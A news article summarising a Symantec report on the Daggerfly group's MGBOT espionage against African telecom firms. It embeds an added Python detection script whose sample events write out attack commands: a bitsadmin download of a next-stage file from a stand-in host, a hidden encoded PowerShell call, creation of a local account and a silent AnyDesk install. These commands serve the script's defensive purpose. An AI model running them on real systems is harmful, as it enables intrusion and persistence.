China’s MGBOT Framework Used in African Espionage

Symantec, a cybersecurity company, has released a report detailing that the Chinese hacking group Daggerfly has been targeting telecommunication companies in Africa since November 2022 to collect intelligence data. Symantec attributes the attacks to Daggerfly based on the tooling used: the group deployed previously undocumented plugins from its MGBOT modular malware framework and also abused the legitimate AnyDesk remote access tool.

In these attacks, Daggerfly relied on living-off-the-land (LotL) techniques, using the built-in Windows tools BITSAdmin and PowerShell to download and deliver the next-stage payload.

Once established on a system, Daggerfly gains persistence by creating a local user account and deploying the MGBOT framework. The MGBOT framework consists of an executable dropper, a DLL loader, and a set of plugins. These multifunctional plugins can give the attackers a significant amount of information about the compromised machine, including browser data, keystroke logging, screenshots, audio recordings, and Active Directory enumeration.
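As an added illustration, not taken from the Symantec report or this article, the following Python checks constructed Sysmon-style process-creation records for the behaviours the article describes: BITSAdmin and PowerShell fetching a next stage, a local account being created for persistence, and AnyDesk being installed. The event fields, command lines and rule names are assumptions made for this example.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1
# (image path plus command line). They are samples for this example only,
# not indicators from the Symantec report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer job1 /download /priority normal "
                    "http://example.invalid/stage2.bin C:\\Users\\Public\\stage2.bin"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc UwB0AGEAZwBlADIA"},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user svc_backup P@ssw0rd! /add"},
    {"Image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "CommandLine": '"C:\\Program Files\\AnyDesk\\AnyDesk.exe" --install '
                    "C:\\ProgramData\\AnyDesk --start-with-win --silent"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Each rule: (name, regex on the lower-cased image path, regex on the
# lower-cased command line). Both must match for the rule to fire.
RULES = [
    ("lotl_bitsadmin_download", r"bitsadmin\.exe$", r"/(transfer|addfile)\b"),
    ("lotl_powershell_download_or_encoded", r"powershell\.exe$",
     r"(-enc\b|-encodedcommand|downloadstring|downloadfile|iex\b|invoke-expression)"),
    ("persistence_local_account_created", r"net1?\.exe$", r"\buser\b.*\s/add\b"),
    ("remote_access_tool_install", r"anydesk\.exe$", r"--install\b"),
]


def match_rules(event):
    """Return the names of all rules that fire on one process-creation event."""
    image = event["Image"].lower()
    cmd = event["CommandLine"].lower()
    return [name for name, image_re, cmd_re in RULES
            if re.search(image_re, image) and re.search(cmd_re, cmd)]


def scan(events):
    """Return (image file name, rule name) pairs for every hit across the events."""
    return [(e["Image"].rsplit("\\", 1)[-1], hit)
            for e in events for hit in match_rules(e)]


if __name__ == "__main__":
    for image_name, rule in scan(SAMPLE_EVENTS):
        print(f"{rule:40s} {image_name}")
```

Benign administration also produces some of these hits, so in practice each rule would be tuned against the environment's normal use of BITS, PowerShell and remote access tools.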

According to Symantec, “all of the above capabilities allow hackers to collect a significant amount of information from victims' computers. The functions of the plugins also show that the main goal of the attackers in this campaign is to collect data.” Symantec added that telecommunication companies will always be a primary target for espionage campaigns because of the potential access they provide to end-users' communications.
